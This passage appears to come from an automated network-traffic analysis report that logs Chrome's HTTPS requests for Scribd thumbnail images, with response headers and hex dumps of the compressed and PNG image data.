                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: 95 58 fb 8a 3c d3 d4 f0 8d a9 2e 18 27 3d c3 58 50 ce fe 06 f2 70 19 84 a8 d6 58 5c 12 e5 4c 56 8f eb cb 30 67 23 3b 38 4a 5c f8 1f 33 89 5d 08 cb eb 52 5e 58 1c 34 73 02 45 a0 7b d4 a7 fe f9 6a 5b df 83 3a 24 5b f2 fe 53 f1 64 62 55 33 56 96 75 9f 26 5e 0e 29 63 1d 56 69 7b 4c bd 27 fc 1e 0f 06 be 06 57 3a 27 6f c4 b5 8f 39 fe a7 53 0c 54 52 6f 51 b1 30 f7 43 8a 5e 5a 5e 8b f8 6d 94 43 29 73 bc d0 48 e1 1c 55 4c 6f a6 aa ad 59 66 88 0a dc b1 fd 11 02 4e 63 d8 36 70 8e 96 55 35 9a 86 46 a1 e9 95 3c fb fa f7 e7 fd 4f e6 af 6e f3 fd d3 da 66 b3 ff af 7a 27 ae fd ef 04 3c 9b e4 89 0e 71 09 42 40 89 0d 86 09 41 fe 27 01 86 cc 9e e1 ea 82 bd 85 3e 6c 69 7d 65 fd 7d 0f 10 a9 f9 82 27 c1 f8 93 0f ed 4e 09 f4 7e 7e 6e fd 5f 7c 06 26 2d 63 b2 55 cf 67 2a 02 08 b0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X<.'=XPpX\LV0g#;8J\3]R^X4sE{j[:$[SdbU3Vu&^)cVi{L'W:'o9STRoQ0C^Z^mC)sHULoYfNc6pU5F<Onfz'<qB@A'>li}e}'N~~n_|&-cUg*
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC1378INData Raw: f9 d9 23 b1 b0 dd 3f 05 33 51 62 67 55 a2 84 e2 65 be bf 74 49 d8 cc 0b 0b 86 6c f3 3b df 75 02 eb 11 c2 8a 35 ad 0b 65 16 0a 90 d3 97 3a d5 29 7a ed 47 9f bd 65 cf b6 db 2b 8b e0 0c d1 5c 65 f8 d7 7f 5b 94 2d 98 ff c3 f6 d5 cd 0f f3 8f 29 80 cb 53 d5 5c 84 82 a5 4b b4 57 e0 f7 8c b1 ec 35 e9 6f ac 43 be 98 b3 9c 87 99 1d a9 ee 48 e2 a1 1a f0 8d 91 82 f3 68 fb d7 1d 27 ed bd 71 f1 ce c8 36 d2 8f 44 00 f4 0a 0e 83 c3 d0 cd e5 1d 3e 09 ba 5b 82 9e 7f dc 54 c6 83 51 d0 65 f5 ab b2 c1 2a dd 5c b5 42 8e 36 0d cb 47 8e 74 0f d4 7d 70 03 bf 24 0b 3d 53 1d 81 d4 d0 5c 4f 6d cb b0 26 69 71 55 75 c9 81 f1 1b e3 0a f1 4a 83 39 47 42 fa 26 bb 2c 49 63 4d 8b 77 5b e0 47 f2 26 35 82 b1 dd d2 68 49 ac 15 a1 03 16 34 ea 1a 8a 3b 42 80 03 d9 f2 34 3d 5e ab f5 94 0a 8f 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: #?3QbgUetIl;u5e:)zGe+\e[-)S\KW5oCHh'q6D>[TQe*\B6Gt}p$=S\Om&iqUuJ9GB&,IcMw[G&5hI4;B4=^
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC138INData Raw: e8 a3 c7 2d 5d 43 51 28 23 54 23 9b 52 4f 8e d1 05 3a 4e 27 2a ac 74 c7 e6 c7 96 97 87 65 69 3f 21 00 4a 47 4d b7 a2 9b 73 b2 f8 3e 65 5a b5 34 39 b4 f1 86 cf 05 09 a1 d4 05 21 30 08 cc ae 80 54 19 50 b1 2c f4 f2 00 f5 3a 1d 0f b5 8c e7 71 14 7b ec 38 42 8a 86 48 de f4 11 52 11 89 6e d4 67 e5 27 0d bb 29 25 2a 4b 38 a6 da 60 b0 3a c1 9f 3e b0 a1 f6 9a 71 e6 09 d2 88 4e c3 90 01 ce 28 5b 97 2d 58 8a 60 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -]CQ(#T#RO:N'*tei?!JGMs>eZ49!0TP,:q{8BHRng')%*K8`:>qN([-X`


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        109192.168.2.1649851151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC411OUTGET /img/word_document/224410406/149x198/b245e05319/1731318738?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 7457
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 99
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 475415
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100043-CHI, cache-ewr-kewr1740037-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 205, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522380.064377,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 ed f3 f9 10 1c 36 eb f1 f7 eb f3 f7 ed f5 fb 14 1a 38 ef f5 fb 10 1c 32 eb f3 f9 ed f5 f9 af b7 bb 14 1c 32 0e 18 2a 52 5a 6a 14 1c 34 14 1c 2c ef f3 f9 eb f5 f9 10 1c 38 e9 f5 f5 eb f5 f5 a1 af b5 0c 1a 32 24 24 24 26 32 42 e9 f1 f5 12 1d 30 e9 f3 fb ed f3 f7 ef f6 f9 0f 1d 2f e9 f1 f7 eb f1 f5 29 29 29 f1 f3 fa 26 25 25 e9 ef f5 e9 f6 fa 21 21 21 e1 e9 ed e9 f3 f8 e7 f0 f3 e7 ed f3 ef f8 fc e4 ec f0 e7 f1 f6 e5 f0 f4 e3 f0 f3 ea f0 f3 e5 ed f2 eb f3 fb f1 f6 fb 25 22 22 ed f1 f6 d6 df e4 e6 f3 f6 db e2 e7 ed f6 f7 ed f3 fc e3 ea ee 39 3f 45 dd e6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE6822*RZj4,82$$$&2B0/)))&%%!!!%""9?E
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: b9 5a 3a 87 1e 7f d1 ec aa fe 26 67 68 ed 9a fd b9 ce e8 7d e5 f9 77 ef 7e d5 e2 4c a9 37 2a 54 d7 14 ca ad d7 d2 49 c9 be 18 e7 fe fb ca d8 a6 68 e7 7e 63 8c b3 64 5f be d2 1b bf 92 6f 5c a6 dd bc 7a 23 29 34 1a 28 96 57 f7 15 47 f6 71 7b 43 e6 de 7a ec ea fc cd 07 ae 9c c7 97 5a 2a 2a ea aa ab b5 2d b7 37 1a 56 f7 1e 39 5c f1 e1 91 12 82 e0 44 fa 50 cb da 8a c3 e5 bd b1 9b f2 f7 69 3f 2a 67 68 15 9d e5 af df cd c9 ef 2c 5e de b7 ff 23 e7 e6 18 e7 81 91 db b9 87 3b 6f 55 94 1f 38 92 7b fb 40 e5 c6 be ea 8a f2 cf fa b4 de 50 e1 18 a5 40 e4 4a 51 9d 62 12 21 22 d1 cb 94 d1 ea 45 80 68 5d ae fb 8a 14 82 54 6a 91 79 38 45 f2 e8 78 85 6a 71 0c 8a 57 c6 ab 34 04 08 02 55 92 fb cc 75 08 51 a5 54 45 2f 8b cd d5 d6 d5 b9 56 c7 6a b5 c5 c5 31 44 a3 23 f2 68 a5 f2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Z:&gh}w~L7*TIh~cd_o\z#)4(WGq{CzZ**-7V9\DPi?*gh,^#;oU8{@P@JQb!"Eh]Tjy8ExjqW4UuQTE/Vj1D#h
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: d7 dc 48 10 cb 01 6c 06 39 69 ae 78 db ee fa fa fa 26 0e 82 2e db ce 6c e6 ed 69 3e 8b c1 ae 33 63 d6 b1 d3 d7 44 08 87 6b d5 88 a3 e2 9a 22 13 47 f5 3b cc 1d f6 e4 d3 ed cc 77 10 9f de a6 4b e5 a5 2d a4 a2 cb 93 93 93 cd 5c 90 3a b3 8d 15 cc 93 46 ea 2b 2a c2 f3 3c e4 21 10 29 0c 17 21 27 b2 17 19 1a 87 30 7b c9 62 2f 5f 3c 74 6f 94 22 e9 c7 14 2c 32 45 81 79 fd 9b 02 88 e3 c9 39 69 4d e3 d5 56 69 e0 e9 1c a0 0a 50 05 a8 7c 4c c5 d2 98 fb 47 1c 3c cb 56 08 bb ff f9 95 2a 21 21 41 2e 53 1e fb fd 6f 2f fc f4 dd 77 77 1f fa dd b1 63 fd 6e 21 7f db 8a 53 4f 7c 5d 16 ea d1 2f 0a 4e 5d 7c bb ff 6d bf 52 09 40 7c eb 2d fe e2 4e 7b 68 04 23 8a 88 08 8d 8a 8a 5a f1 e9 71 85 64 2c bf 51 11 a4 31 fe fc d7 a7 3e 8e 98 32 54 62 62 62 44 44 c4 76 5b 9b ce 9f 54 a0 7f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Hl9ix&.li>3cDk"G;wK-\:F+*<!)!'0{b/_<to",2Ey9iMViP|LG<V*!!A.So/wwcn!SO|]/N]|mR@|-N{h#Zqd,Q1>2TbbbDDv[T
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 50 ad 75 07 b3 be ec 7c 68 fe fc 59 b9 e4 54 e4 f3 35 85 e8 82 62 41 e8 71 15 8d 96 98 90 99 8d e5 39 fd ca 74 dc 99 0d 1a 17 ff de fc ff f6 e5 fd 00 3e f8 87 0b ad 63 b8 ec b2 e2 62 50 c1 85 0d bd 0e 8b 13 4b a7 c9 91 9f 0e 46 22 16 63 af e5 6e f3 2f 7e 2b fd 58 91 b0 75 fc be fb 70 5a 87 2b 68 4e 87 d3 f6 a0 33 25 a4 76 12 76 bf df e2 08 36 50 65 a9 bc c4 ef 50 d9 82 87 16 7f 88 af e4 b9 dc b6 e1 30 6d 89 38 63 59 bf 3f 98 76 a7 00 49 95 8b 8a 3c 1f f5 bb 2d 0e ab 28 07 d8 e6 71 49 6f 0f 5a e2 f6 b4 b1 d7 f7 a6 7d 3b a7 b9 b2 cd 7e f3 f4 a3 cd d0 a2 a8 52 7a ad 5e b7 6b 5e 59 3d 3a 3a 48 c4 84 bb e5 5c 6f 27 ea 58 76 f0 fe b2 18 65 f8 a3 55 5c e8 ec 6d 6e b8 ed 99 68 f4 69 39 a9 20 41 12 9a 2f 47 b4 0a ce bb 68 6f da 1a ef fb fc 62 43 6b b3 12 5f e5 7e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Pu|hYT5bAq9t>cbPKF"cn/~+XupZ+hN3%vv6PeP0m8cY?vI<-(qIoZ};~Rz^k^Y=::H\o'XveU\mnhi9 A/GhobCk_~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 12 27 41 22 4d b2 6d da 20 fd b3 84 8a da 36 05 87 4a 62 1b eb 8b 95 d6 97 30 a2 d0 97 32 f5 a5 2c 0e 28 be 2c 82 ca 16 da d2 c2 3e 59 76 a0 d6 79 ba 62 19 c6 dd 29 03 43 bd c5 c5 f1 69 a0 20 3a 23 e3 bd 4f f7 c2 2c ec bd 27 ea ba 33 70 67 77 46 ef a2 b0 73 12 9a e6 3b 49 f9 35 e7 3b df bf 93 f3 1d 9f 34 1a e3 e5 57 eb 44 2c 86 60 f9 a4 23 de 13 93 d9 58 4c b0 0e 7b 84 89 98 f4 2a 26 7d c8 48 fe 48 be 02 de cd d1 e7 af 3a f8 89 50 74 77 cc d7 38 9a 84 4f 77 79 e8 cb cc 8d fb 87 ad 38 b5 3f 9f 61 1f ed 53 8b 8c 30 b2 a4 d1 6d da fd af 1d 23 0f 76 7d f3 93 df 3d ff 63 43 78 34 81 50 35 9e 3e 70 fc 35 b4 4b 7d 7d df b3 b1 3f 2c 3f 2b e0 23 7f 19 85 e0 4a 7a 90 2e 78 26 b4 46 8c f2 1c b1 85 55 6d b5 71 20 8c 4e 00 60 cd 0c 0b 05 bc 17 e0 99 f1 bf 7b 32 7e f9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 'A"Mm 6Jb02,(,>Yvyb)Ci :#O,'3pgwFs;I5;4WD,`#XL{*&}HH:Ptw8Owy8?aS0m#v}=cCx4P5>p5K}}?,?+#Jz.x&FUmq N`{2~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC567INData Raw: 30 0e aa 16 74 a2 cd 11 45 bc ec 74 04 6b 35 54 d9 eb 40 0c de 1b 74 76 52 02 a2 39 18 19 d1 6a 66 07 01 b0 4b 8a d2 d0 9d 53 94 5c cf bd b4 aa d3 e0 6a a8 dc 3b f1 f8 b1 1e 0e 87 eb 2b 8a 1e d7 c3 8a 2a 2a 19 24 02 07 3c 5e a8 69 56 65 83 77 cd 68 72 5c 09 7b e3 8a 25 5c b7 78 15 bb 4b 76 59 06 66 34 62 38 a0 f9 c2 61 55 57 e2 de 97 8c 6f 15 b0 90 9f 5b ab 2f 1c a7 9a 21 f9 aa a8 8c 48 f2 76 d6 28 56 22 5b db 5b 7b a5 62 b1 ba 90 4f 18 46 c4 28 2f 84 8b 89 94 51 4e 1f 1a 89 c3 ea de de f6 b6 b1 5d da 2e 56 5f 4f 97 23 c5 54 d3 48 b8 8b ad aa b1 5d 29 b5 5e e7 a7 1a 96 28 2b 8d 07 7c 0d 97 61 ec ed 55 d6 2c e0 8a b6 a8 55 b2 59 6d ba 6a 77 8b aa 4d 17 75 24 51 75 ab 45 94 24 9d b6 89 ba 68 55 39 55 94 ec a2 5d d7 45 51 b4 a1 6a 9d 93 44 b4 49 22 a7 4a a2
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0tEtk5T@tvR9jfKS\j;+**$<^iVewhr\{%\xKvYf4b8aUWo[/!Hv(V"[[{bOF(/QN].V_O#TH])^(+|aU,UYmjwMu$QuE$hU9U]EQjDI"J


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        110192.168.2.1649850151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:39 UTC411OUTGET /img/word_document/310560108/149x198/44055ac324/1733356526?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 19584
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 84
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 165768
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100096-CHI, cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 39, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522380.064479,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 ff ff ff dd 2e 1e dd 2c 1e df 2e 1e dd 2e 20 f7 c3 06 f5 c1 06 f7 c1 06 df 2e 20 f9 c3 06 dd 2c 20 db 2c 20 e1 2e 1f db 2c 1e db 2e 20 00 00 00 03 02 00 f5 bf 06 f3 bf 06 df 2c 1e 07 05 00 df 2c 20 d9 2c 1f f9 c1 05 17 12 00 0f 0c 00 f7 c1 08 f9 c5 06 f5 c1 08 db 2e 1e ff ff fd fc c5 06 13 0f 00 0a 07 00 fa c4 08 f7 c3 08 1b 16 00 fe fb fa 34 29 02 1e 17 00 fc e8 e6 e0 36 29 f0 bd 06 2b 22 01 f2 bf 06 fd f0 ef e0 30 22 25 1d 02 12 0e 00 0c 0a 01 1f 06 04 f8 c9 c6 17 04 03 25 1e 00 21 1a 00 1a 14 00 fc f7 f5 fa d7 d4 28 08 06 4a 3b 02 f7 bf 06 f4 ae
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE.,.. . , , .,. ,, ,.4)6)+"0"%%!(J;
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: ab c8 f3 d4 b4 9e 7a be e8 56 7d 7f 11 34 89 e0 ed 55 2b 2e 07 5c 89 cd c1 d4 75 09 59 ca 8d a6 e4 ee 09 ae b5 27 1e 78 0d c2 b9 bc eb 37 d2 74 24 0f 93 e1 33 a8 ea 16 4f 0c 81 13 79 d5 30 4c d5 b4 a6 86 54 af 10 93 3b 13 ad ba 43 04 c3 99 5a 26 97 23 2a 6f a8 2d ae 65 68 a6 71 56 57 45 41 94 48 85 5a ab 52 cb 11 79 a7 5e a9 9b bc 65 92 7a ab aa 9a a0 29 38 4d a2 9e 89 b6 2a f2 53 9e 10 cb 82 8b 5d 27 a6 d6 82 29 87 be b5 eb ce 54 90 44 61 5a 7d 06 15 79 38 9e dc 7e 65 e2 b3 c3 70 9e b3 e1 54 92 fb f6 ba 2f dc 3f bb 33 4c 92 69 1a ef 27 22 89 d2 45 6c 77 25 43 d7 97 ad 70 50 4f 64 42 e4 c9 74 5f 1f 76 17 69 38 e9 0e 96 50 d1 a1 3d d4 17 c1 7e d8 af 92 94 4f f4 85 27 12 bb 29 ea cb 89 17 3a 67 4d b9 9b 9a cd 6a 2e 17 b7 96 7a 14 88 49 a8 91 d8 5c 7a ad 38
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zV}4U+.\uY'x7t$3Oy0LT;CZ&#*o-ehqVWEAHZRy^ez)8M*S]')TDaZ}y8~epT/?3Li'"Elw%CpPOdBt_vi8P=~O'):gMj.zI\z8
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: d4 12 e7 14 26 eb 91 6c cc 52 c6 65 50 14 35 07 a6 b6 76 58 60 8b d2 0b fc 30 f9 f5 1e 04 0e 3b 94 b9 32 ca 12 01 9c 88 ca 9d d6 19 51 30 40 0c a8 07 33 3b 38 6b b6 ce a7 36 a0 d4 e2 6d 05 e6 3a 00 2b 5f 82 b3 8c e9 7a 46 99 33 c5 a2 42 79 ca 4a 88 ff 05 a8 a8 26 a0 14 88 66 ca 64 cd d4 61 b7 fe bc a5 b0 45 c4 80 b8 a0 3e e0 05 a3 3c fb aa 08 7c b0 3b 3b 1b 60 b2 93 9f 53 9a 32 1a d8 8d fc 2b 68 70 20 26 5f f8 27 40 cf 17 20 ea 06 8b e7 79 da f6 9d 7c fe 65 e9 e5 cb fc 6f 69 e5 e8 56 90 a7 3f 5a 49 da 9f d0 1a 10 01 06 2a 78 0c 40 b7 e9 1c a0 62 69 09 b7 e9 15 42 74 18 6a 82 68 b9 10 bd 02 7d f0 82 65 7e d8 dc 7c fd f7 4e 07 95 ff f4 bb cd df ff 05 a1 ef ff b8 f9 e2 c5 8b d7 af 37 5f 7f f7 c3 df fe b0 f9 dd 3f be ff 37 11 d6 ef da b6 f6 c5 b3 dc 7b d1 a4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: &lReP5vX`0;2Q0@3;8k6m:+_zF3ByJ&fdaE><|;;`S2+hp &_'@ y|eoiV?ZI*x@biBtjh}e~|N7_?7{
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 17 ed 76 fa 39 ea 16 fe d9 82 3a 24 fe 51 5c 13 79 2b b5 0a 42 2f 5a 94 4d f9 0f 0d eb 4e 1c 44 b6 06 e9 aa 89 4f 86 2c 89 08 48 71 0e d3 ab 19 64 13 ff 73 fc ee fd b2 f4 cb 01 f4 4a 88 b5 ed 3d d8 f7 d9 76 9c 11 45 c4 be b0 fe 17 7f 90 bc 83 3b 65 dd ee a8 ff 94 8d c7 39 ab cf a4 ff e1 46 9f 95 36 88 17 cd f8 98 55 a8 80 70 e3 30 4f 95 c2 2c 99 1e 5e 03 bb 13 aa 03 60 cb 65 c8 61 95 46 c8 e4 91 1c 32 11 84 04 69 bb dc e8 38 f8 59 df 46 9d 5e af 33 98 a9 7a 1a 75 3b e5 81 1c 93 03 e3 b9 bd 29 dc c2 c6 f7 78 2f 7a d5 b1 a4 57 64 72 8e 7a 1c 60 e6 17 67 65 14 9c 4b 56 72 fa 23 72 50 55 71 0c e4 c0 07 f1 82 84 49 ba 1c 39 9f 3a e1 22 8e 9f 2d 89 0d 4d 54 12 94 6d c8 df 21 ab 35 a2 e9 c6 f5 e3 77 c3 f3 b8 df fd 7e 63 67 e2 74 1a 2f bb 3e 94 21 14 9c 9c d6 7e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: v9:$Q\y+B/ZMNDO,HqdsJ=vE;e9F6Up0O,^`eaF2i8YF^3zu;)x/zWdrz`geKVr#rPUqI9:"-MTm!5w~cgt/>!~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 8d a1 2b 28 5e e5 31 ab 56 8b 02 95 fa 01 ff 96 ea 7b a3 55 46 02 4f 82 6f e0 a9 a0 3b 15 79 67 3c 1e 22 0f 0d 58 03 fa bd 25 f1 b7 1c e6 30 a8 2a 0a 0e 3c 35 47 32 ac 22 60 58 4e 8b b2 05 7c e9 f5 da 43 79 e9 48 6b 5c eb 2f d7 80 9e e0 f0 26 68 27 78 0e 99 54 a8 00 57 40 a1 6b dc 6d 65 70 08 e2 c1 c2 54 7d 75 42 bf 43 6b a7 d0 14 e4 27 b0 f3 fd 6a a9 7a 9b f3 18 55 e0 9f b2 bc cc e7 f3 cb e7 fd 78 28 15 43 e7 a9 57 96 8f 18 5c 75 a0 80 1f 65 39 7f e6 8a 43 99 cd 0f f0 73 99 97 d9 d7 77 52 95 eb de 25 cb 2e 9f f3 cb a5 cc 7e 31 76 57 96 bd 35 9c f6 43 59 96 39 ac e5 19 7e ef c1 93 ca f2 30 85 7a d4 fa 20 21 3a 00 9c b0 71 68 2c e4 c1 0e 39 7a 8c 0e 1b 20 44 d8 29 be a8 80 c7 72 5d 3f ce 60 8d 3f 2b 37 0e 30 1e bc 03 06 bc 9a f0 df 04 b6 49 c6 d1 52 a3 f0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: +(^1V{UFOo;yg<"X%0*<5G2"`XN|CyHk\/&h'xTW@kmepT}uBCk'jzUx(CW\ue9CswR%.~1vW5CY9~0z !:qh,9z D)r]?`?+70IR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:40 UTC1378INData Raw: 22 eb 53 a4 7a 50 97 00 e8 84 37 99 d2 f5 ec f3 fa 9c 7a 96 8b f2 7e ad ec ac f4 f1 e5 f1 47 4c ba a9 42 72 02 4c bc 8f 37 1a cd 85 48 f1 22 8e 82 2c 65 d3 e9 34 66 8f 76 39 71 bd 69 21 fd 74 8f a6 fa fc 32 db a2 07 01 92 71 55 c3 48 50 38 32 8c aa 82 40 c9 39 8c 30 9c ae 1a 1a 09 cd c0 10 0b 60 69 a2 94 c9 a6 3f c7 14 4c e4 33 c1 17 56 c0 53 87 65 57 d9 03 13 af ed c0 4c b7 c8 76 5a 47 3c 49 1d 04 26 89 50 05 5b fc 46 43 bc 12 ab b9 5a 1f b1 9f 7b 37 3c a3 64 ec 5d 8e 22 ef 5c 48 5f e1 26 f0 66 34 a3 f9 0e 07 1c 07 23 c5 4f be c3 3f 0d 6b 15 da 32 20 03 86 45 29 94 33 ef c3 6a 10 0a 48 f8 4b 07 5f f7 56 14 11 b0 0c 78 6a 25 0d b8 cc 5f 18 fb 5b c6 e7 7a 17 90 01 eb 74 02 91 dd 61 64 a5 09 19 d0 aa 23 32 e0 b2 50 1e 92 7c 6c b2 7b b0 4c 16 57 0c 57 76 e0
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: "SzP7z~GLBrL7H",e4fv9qi!t2qUHP82@90`i?L3VSeWLvZG<I&P[FCZ{7<d]"\H_&f4#O?k2 E)3jHK_Vxj%_[ztad#2P|l{LWWv
